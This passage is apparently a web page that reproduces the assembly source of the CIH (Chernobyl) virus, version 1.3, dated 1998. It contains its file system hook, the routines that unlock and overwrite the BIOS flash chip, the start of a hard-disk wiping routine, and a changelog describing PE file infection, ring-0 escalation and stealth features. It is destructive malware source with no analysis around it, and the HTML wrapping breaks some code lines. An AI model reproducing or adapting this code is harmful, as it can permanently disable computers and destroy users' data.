      <P>jmp [eax] ; Jump to prevhook</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Call the Function that the IFS *</P>
      <P>; * Manager Would Normally Call to *</P>
      <P>; * Implement this Particular I/O *</P>
      <P>; * Request. *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>pIFSFunc:</P>
      <P>mov ebx, esp</P>
      <P>push dword ptr [ebx+20h+04h+14h] ; Push pioreq</P>
      <P>call [ebx+20h+04h] ; Call pIFSFunc</P>
      <P>pop ecx ;</P>
      <P> </P>
      <P>mov [ebx+1ch], eax ; Modify EAX Value in Stack</P>
      <P> </P>
      <P>; ***************************</P>
      <P>; * After Calling pIFSFunc, *</P>
      <P>; * Get Some Data from the *</P>
      <P>; * Returned pioreq. *</P>
      <P>; ***************************</P>
      <P> </P>
      <P>cmp dword ptr [ebx+20h+04h+04h], 00000024h</P>
      <P>jne QuitMyVirusFileSystemHook</P>
      <P> </P>
      <P>; *****************</P>
      <P>; * Get the File *</P>
      <P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
      <P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
      <P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
      <P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
      <P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
      <P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
      <P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
      <P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
      <P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
      <P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
      <P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
      <P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
      <P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
      <P>; **************************************</P>
      <P> </P>
      <P>; ***************************</P>
      <P>; * Kill BIOS EEPROM *</P>
      <P>; ***************************</P>
      <P> </P>
      <P>mov bp, 0cf8h</P>
      <P>lea esi, IOForEEPROM-@7[esi]</P>
      <P> </P>
      <P>; ***********************</P>
      <P>; * Show BIOS Page in *</P>
      <P>; * 000E0000 - 000EFFFF *</P>
      <P>; * ( 64 KB ) *</P>
      <P>; ***********************</P>
      <P> </P>
      <P>mov edi, 8000384ch</P>
      <P>mov dx, 0cfeh</P>
      <P>cli</P>
      <P>call esi</P>
      <P> </P>
      <P>; ***********************</P>
      <P>; * Show BIOS Page in *</P>
      <P>; * 000F0000 - 000FFFFF *</P>
      <P>; * ( 64 KB ) *</P>
      <P>; ***********************</P>
      <P> </P>
      <P>mov di, 0058h</P>
      <P>dec edx ; and a</P>
      <P>0fh</P>
      <P>mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h</P>
      <P>call esi</P>
      <P> </P>
      <P>; ***********************</P>
      <P>; * Show the BIOS Extra *</P>
      <P>; * ROM Data in Memory *</P>
      <P>; * 000E0000 - 000E01FF *</P>
      <P>; * ( 512 Bytes ) *</P>
      <P>; * , and the Section *</P>
      <P>; * of Extra BIOS can *</P>
      <P>; * be Writted... *</P>
      <P>; ***********************</P>
      <P> </P>
      <P>lea ebx, EnableEEPROMToWrite-@10[esi]</P>
      <P> </P>
      <P>mov eax, 0e5555h</P>
      <P>mov ecx, 0e2aaah</P>
      <P>call ebx</P>
      <P>mov byte ptr [eax], 60h</P>
      <P> </P>
      <P>push ecx</P>
      <P>loop $</P>
      <P> </P>
      <P>; ***********************</P>
      <P>; * Kill the BIOS Extra *</P>
      <P>; * ROM Data in Memory *</P>
      <P>; * 000E0000 - 000E007F *</P>
      <P>; * ( 80h Bytes ) *</P>
      <P>; ***********************</P>
      <P> </P>
      <P>xor ah, ah</P>
      <P>mov [eax], al</P>
      <P> </P>
      <P>xchg ecx, eax</P>
      <P>loop $</P>
      <P> </P>
      <P>; ***********************</P>
      <P>; * Show and Enable the *</P>
      <P>; * BIOS Main ROM Data *</P>
      <P>; * 000E0000 - 000FFFFF *</P>
      <P>; * ( 128 KB ) *</P>
      <P>; * can be Writted... *</P>
      <P>; ***********************</P>
      <P> </P>
      <P>mov eax, 0f5555h</P>
      <P>pop ecx</P>
      <P>mov ch, 0aah</P>
      <P>call ebx</P>
      <P>mov byte ptr [eax], 20h</P>
      <P> </P>
      <P>loop $</P>
      <P> </P>
      <P>; ***********************</P>
      <P>; * Kill the BIOS Main *</P>
      <P>; * ROM Data in Memory *</P>
      <P>; * 000FE000 - 000FE07F *</P>
      <P>; * ( 80h Bytes ) *</P>
      <P>; ***********************</P>
      <P> </P>
      <P>mov ah, 0e0h</P>
      <P>mov [eax], al</P>
      <P> </P>
      <P>; ***********************</P>
      <P>; * Hide BIOS Page in *</P>
      <P>; * 000F0000 - 000FFFFF *</P>
      <P>; * ( 64 KB ) *</P>
      <P>; ***********************</P>
      <P>; or al</P>
      <P>0h</P>
      <P>mov word ptr (BooleanCalculateCode-@10)[esi], 100ch</P>
      <P>call esi</P>
      <P> </P>
      <P>; ***************************</P>
      <P>; * Kill All HardDisk *</P>
      <P>; ***************************************************</P>
      <P>; * IOR Structure of IOS_SendCommand Needs *</P>
      <P>; ***************************************************</P>
      <P>; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *</P>
      <P>; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *</P>
      <P>; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *</P>
      <P>; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *</P>
      <P>; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *</P>
      <P>; ***************************************************</P>
      <P> </P>
      <P>KillHardDisk:</P>
      <P>xor ebx, ebx</P>
      <P>mov bh, FirstKillHardDiskNumber</P>
      <P>push ebx</P>
      <P>sub esp, 2ch</P>
      <P>push 0c0001000h</P>
      <P>; ***************************</P>
      <P>; * IO for EEPROM *</P>
      <P>; ***************************</P>
      <P> </P>
      <P>IOForEEPROM:</P>
      <P>@10 = IOForEEPROM</P>
      <P> </P>
      <P>xchg eax, edi</P>
      <P>xchg edx, ebp</P>
      <P>out dx, eax</P>
      <P> </P>
      <P>xchg eax, edi</P>
      <P>xchg edx, ebp</P>
      <P>in al, dx</P>
      <P> </P>
      <P>BooleanCalculateCode = $</P>
      <P>or al, 44h</P>
      <P> </P>
      <P>xchg eax, edi</P>
      <P>xchg edx, ebp</P>
      <P>out dx, eax</P>
      <P> </P>
      <P>xchg eax, edi</P>
      <P>xchg edx, ebp</P>
      <P>out dx, al</P>
      <P> </P>
      <P>ret</P>
      <P> </P>
      <P>; *********************************************************</P>
      <P>; * Static Data *</P>
      <P>; *********************************************************</P>
      <P> </P>
      <P>LastVxDCallAddress = IFSMgr_Ring0_FileIO</P>
      <P>VxDCallAddressTable db 00h</P>
      <P>db IFSMgr_RemoveFileSystemApiHook-_PageAllocate</P>
      <P>db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook</P>
      <P>db IFSMgr_Ring0_FileIO-UniToBCSPath</P>
      <P> </P>
      <P>VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h</P>
      <P>VxDCallTableSize = ($-VxDCallIDTable)/04h</P>
      <P> </P>
      <P>; *********************************************************</P>
      <P>; * Virus Version Copyright *</P>
      <P>; *********************************************************</P>
      <P> </P>
      <P>VirusVersionCopyright db 'CIH v'</P>
      <P>db MajorVirusVersion+'0'</P>
      <P>db '.'</P>
      <P>db MinorVirusVersion+'0'</P>
      <P>db ' TTIT'</P>
      <P> </P>
      <P>; *********************************************************</P>
      <P>; * Virus Size *</P>
      <P>; *********************************************************</P>
      <P> </P>
      <P>VirusSize = $</P>
      <P>; + SizeOfVirusCodeSectionTableEndMark(04h)</P>
      <P>; + NumberOfSections(??)*SizeOfVirusCodeSectionTa</P>
      <P>e(08h)</P>
      <P>; + SizeOfTheFirstVirusCodeSectionTable(04h)</P>
      <P> </P>
      <P>; *********************************************************</P>
      <P>; * Dynamic Data *</P>
      <P>; *********************************************************</P>
      <P> </P>
      <P>VirusGameDataStartAddress = VirusSize</P>
      <P>PointerToRelocations = StartOfSectionTable+18h ; DWORD</P>
      <P>PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD</P>
      <P>NumberOfRelocations = StartOfSectionTable+20h ; WORD</P>
      <P>NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD</P>
      <P>Characteristics = StartOfSectionTable+24h ; DWORD</P>
      <P>SizeOfScetionTable = Characteristics+04h-SectionName</P>
      <P> </P>
      <P>; *********************************************************</P>
      <P>; * Virus Total Need Memory *</P>
      <P>; *********************************************************</P>
      <P> </P>
      <P>VirusNeedBaseMemory = $</P>
      <P> </P>
      <P>VirusTotalNeedMemory = @9</P>
      <P>; + NumberOfSections(??)*SizeOfScetionTable(28h)</P>
      <P>; + SizeOfVirusCodeSectionTableEndMark(04h)</P>
      <P>; + NumberOfSections(??)*SizeOfVirusCodeSectionTa</P>
      <P>e(08h)</P>
      <P>; + SizeOfTheFirstVirusCodeSectionTable(04h)</P>
      <P> </P>
      <P>; *********************************************************</P>
      <P>; *********************************************************</P>
      <P>; 
      ****************************************************************************</P>
      <P>; * The Virus Program Information *</P>
      <P>; 
      ****************************************************************************</P>
      <P>; * *</P>
      <P>; * Designer : CIH Original Place : TTIT of Taiwan *</P>
      <P>; * Create Date : 04/26/1998 Now Version : 1.3 *</P>
      <P>; * Modification Time : 05/24/1998 *</P>
      <P>; * *</P>
      <P>; 
      *==========================================================================*</P>
      <P>; * Modification History *</P>
      <P>; 
      *==========================================================================*</P>
      <P>; * v1.0 1. Create the Virus Program. *</P>
      <P>; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *</P>
      <P>; * 04/26/1998 3. Virus Code doesn't Reload into System. *</P>
      <P>; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *</P>
      <P>; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *</P>
      <P>; * 6. When System Opens Existing PE File, the File will be *</P>
      <P>; * Infected, and the File doesn't be Reinfected. *</P>
      <P>; * 7. It is also Infected, even the File is Read-Only. *</P>
      <P>; * 8. When the File is Infected, the Modification Date and Time *</P>
      <P>; * of the File also don't be Changed. *</P>
      <P>; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *</P>
      <P>; * Previous FileSystemApiHook, it will Call the Function *</P>
      <P>; * that the IFS Manager Would Normally Call to Implement *</P>
      <P>; * this Particular I/O Request. *</P>
      <P>; * 10. The Virus Size is only 656 Bytes. *</P>
      <P>; 
      *==========================================================================*</P>
      <P>; * v1.1 1. Especially, the File that be Infected will not Increase 
      *</P>
      <P>; * it's Size... ^__^ *</P>
      <P>; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *</P>
      <P>; * When Exception Error Occurs, Our OS System should be in *</P>
      <P>; * Windows NT. So My Cute Virus will not Continue to Run, *</P>
      <P>; * it will Jmup to Original Application to Run. *</P>
      <P>; * 3. Use Better Algorithm, Reduce Virus Code Size. *</P>
      <P>; * 4. The Virus "Basic" Size is only 796 Bytes. *</P>
      <P>; 
      *==========================================================================*</P>
      <P>; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *</P>
      <P>; * 2. Modify the Bug of v1.1 *</P>
      <P>; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *</P>
      <P>; 
      *==========================================================================*</P>
      <P>; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. 
      *</P>
      <P>; * So When Open WinZip Self-Extractor ==&gt; Don't Infect it. *</P>
      <P>; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *</P>
      <P>; 
      ****************************************************************************</P>
      <P> </P>
      <P>.586P</P>
      <P> </P>
      <P>; 
      ****************************************************************************</P>
      <P>; * Original PE Executable File(Don't Modify this Section) *</P>
      <P>; 
      ****************************************************************************</P>
      <P> </P>
      <P>OriginalAppEXE SEGMENT</P>
      <P> </P>
      <P>FileHeader:</P>
      <P>db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h</P>
      <P>db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h</P>
      <P>db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h</P>
      <P>db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh</P>
      <P>db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h</P>
      <P>db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h</P>
      <P>db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh</P>
      <P>db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh</P>
      <P>db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h</P>
      <P>db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah</P>
      <P>db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h</P>
      <P>db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h</P>
      <P>db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h</P>
      <P>db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h</P>
      <P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h</P>
      <P>db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h</P>
      <P>db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h</P>
      <P>db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
